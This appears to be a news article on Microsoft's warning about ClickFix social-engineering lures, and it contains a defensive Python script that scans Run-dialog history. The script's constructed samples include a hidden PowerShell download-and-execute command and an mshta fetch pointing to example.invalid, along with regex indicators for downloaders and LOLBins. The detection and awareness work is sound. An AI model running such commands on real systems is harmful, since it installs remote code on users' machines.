Microsoft Warns All Windows Users—This Message Is An Attack

Posted by Zak Doffman, Contributor | 5 hours ago | Cybersecurity, Innovation


“Think before you Click,” Microsoft has just warned all Windows PC users — adding that macOS users are also not immune from a plague of attacks that is now “targeting thousands of enterprise and end-user devices globally every day.”

We’re talking ClickFix, the devastating social engineering that has tricked millions of device users into attacking themselves, running malicious scripts on PCs or Macs after responding to an on-screen message warning of a technical or security issue.

The scripts ultimately install malware on those machines. “These payloads affect Windows and macOS devices,” Microsoft says, “and typically lead to information theft and data exfiltration.” But the malware can be anything, including a form of initial access for ransomware or an entry point to attack wider enterprise networks.


ClickFix initially came to prominence as a fake technical-support popup before expanding to CAPTCHAs. Fake challenges gating access to websites now present a copy, paste, run instruction as an alternative to selecting cars and buses or reorienting an image.

“It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell. It’s often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.”

That ClickFix needs this user action should be its undoing. However it is presented, if you know never to paste and run a command that a web page or popup hands you into the Run dialog, a terminal or PowerShell, you cannot be duped. But despite the scale of these attacks, that awareness has not yet taken hold.

“Because ClickFix relies on human intervention to launch the malicious commands,” Microsoft says, it can bypass “conventional and automated security solutions.” Security teams can “reduce the impact of this technique by educating users in recognizing its lures and by implementing policies that will harden device configurations.”
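Because the malicious command is typed by the user rather than launched by an exploit, one cheap detection-side check is to look where Windows records what was entered into the Run dialog. The following Python triage script is an added example written for this page, not code from Microsoft's report or from Forbes: it walks entries shaped like the RunMRU registry key (the key path is real; the sample values embedded below are constructed, and example.invalid never resolves), decodes any PowerShell -EncodedCommand payload, and scores each command against a heuristic indicator list of my own choosing.

```python
import base64
import re

# Constructed sample shaped like the RunMRU registry key
# (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), where
# Windows keeps Run-dialog history: values a, b, c ... hold the typed command
# followed by a literal "\1", and MRUList lists the value names newest-first.
# Nothing here was captured from a real machine.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "mshta https://example.invalid/verify.hta\\1",
    "c": "powershell -w hidden -ep bypass -enc "
         + base64.b64encode("iex (irm https://example.invalid/p)".encode("utf-16-le")).decode("ascii")
         + "\\1",
}

# Heuristic indicators of a pasted ClickFix-style command (my own list, not
# Microsoft's). Each regex is run over the command and, when present, over the
# decoded -EncodedCommand payload as well.
INDICATORS = [
    ("encoded_command", re.compile(r"-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("execpolicy_bypass", re.compile(r"-(?:executionpolicy|ep)\s+bypass", re.I)),
    ("inline_eval", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("downloader", re.compile(r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|curl|wget)\b", re.I)),
    ("lolbin", re.compile(r"\b(?:mshta|msiexec|certutil|bitsadmin)\b", re.I)),
    ("url", re.compile(r"https?://", re.I)),
    ("captcha_lure_text", re.compile(r"not a robot|recaptcha|verification id", re.I)),
]


def decode_encoded_command(cmd):
    """Return the plaintext of a PowerShell -EncodedCommand payload, or None.

    PowerShell expects base64 of UTF-16LE text, so anything that fails to
    decode that way is not a valid encoded command and is reported as None.
    """
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_runmru(runmru):
    """Walk RunMRU entries newest-first and flag ClickFix-looking commands."""
    findings = []
    for slot in runmru.get("MRUList", ""):
        data = runmru.get(slot)
        if data is None:
            continue
        # Strip the trailing "\1" marker that Explorer appends to each entry.
        cmd = data[:-2] if data.endswith("\\1") else data
        decoded = decode_encoded_command(cmd)
        haystack = cmd if decoded is None else cmd + "\n" + decoded
        hits = [label for label, rx in INDICATORS if rx.search(haystack)]
        findings.append({
            "slot": slot,
            "command": cmd,
            "decoded": decoded,
            "indicators": hits,
            # A single indicator (a URL, a curl) is common in benign use; an
            # encoded command in Run-dialog history is not, so it flags alone.
            "suspicious": len(hits) >= 2 or "encoded_command" in hits,
        })
    return findings


if __name__ == "__main__":
    for f in triage_runmru(SAMPLE_RUNMRU):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"[{flag}] slot {f['slot']}: {f['command']}")
        if f["decoded"]:
            print(f"    decoded: {f['decoded']}")
        if f["indicators"]:
            print(f"    indicators: {', '.join(f['indicators'])}")
```

On a live host the same dictionary can be built from an export of the RunMRU key. Note its limit: RunMRU only records the Run dialog, so a command pasted into Windows Terminal or a PowerShell window has to be found through PowerShell's own history or script block logging (Event ID 4104) instead.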

Microsoft’s new report is the most exhaustive I’ve seen on ClickFix, and it neatly sets out a wide range of lures and variations on the theme. But per the image above, you can see how easy it is to tell a ClickFix attack when you know what to look for. Meanwhile, the lures and facades are limitless and will continue to evolve.

Ultimately, ClickFix relies on its simplicity. As Microsoft says, “a typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure — usually a landing page — and trick them into executing a malicious command themselves.” But if you know, you know.


And that will always be the key takeaway with ClickFix. Even as “threat actors adapt and improve certain elements of the technique to further evade detection,” which includes “obfuscating the JavaScript that generates the visual lures or downloading parts of the code from different servers,” the final step is the same. Copy, paste, run.

The hope has to be that there is now so much publicity around ClickFix, of which Microsoft’s report is only the latest, that users will catch on.

A socially engineered attack needs a socially engineered solution. And while Microsoft’s mitigation recommendations are steeped in security defenses and shoring up enterprise systems with its own tools, the reality is that this is all about user awareness.

Once you know, you know. And then you can’t be tricked.
